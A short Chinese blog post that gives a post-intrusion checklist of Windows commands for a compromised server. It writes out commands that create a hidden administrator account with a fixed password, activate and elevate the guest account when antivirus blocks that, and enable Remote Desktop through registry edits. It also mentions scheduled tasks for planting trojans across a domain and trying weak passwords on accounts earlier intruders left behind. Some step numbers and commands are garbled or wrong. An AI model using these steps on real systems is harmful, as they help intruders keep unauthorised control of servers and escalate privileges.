1、whoami查看当前权限,当不是administrator或者system时需要提权
2、ipconfig,查看服务器为内网还是外网,内网进服务器则需要转发端口
3、quser查看管理是否在线
4、systeminfo查看服务器信息及相应的补丁,可找相应的补丁提权
5、tasklist查看当前运行的进程,是否有av,可利用的第三方的服务提权等
6、net user查看用户,当发现可疑用户时,可以弱口令尝试一波,因为可能是前辈的脚印,大多数都是弱口令
7、
net user soarli secquan /add添加一个账号为soarli密码为secquan的用户,当权限不足时或者有av拦截会提示拒绝访问然后一般会出现一个数字5
8、
net localgroup administrators soarli /add将soarli这个用户加到管理组
9、当有av拦截第5步添加用户时,可以激活guest账户
net user guest /active:yes ,重复第6步,将guest账户提升至管理员
10、删除用户
net user secquan /del11、查看远程桌面端口,
tasklist /svc在输出的内容中查找svchost.exe进程下termservice服务对应的PID,在此查看的PID为:2400,查看第五步时pid为2400的端口,既为远程桌面端口
12、查看远程端口或者使用注册表(REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" “Server\WinStations\RDP-Tcp /v PortNumber)再set /a a=0xd3d
13、当远程桌面服务被关闭时,可以用注册表命令开启(REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f)
14、结束进程,
taskkill /im mspaint.exe或者
taskkill /pid pid号。结束1484这个进程
tasjkill /pid 404815、 netstat查看端口连接
16、set查看命令组件是否可执行
17、sc查看mysql查看服务运行权限和路径的
18、 at,定时任务,常用于域中种马
参考资料:
https://blog.csdn.net/weixin_39216626/article/details/103869243
版权属于:soarli
本文链接:https://blog.soarli.top/archives/506.html
转载时须注明出处及本声明。
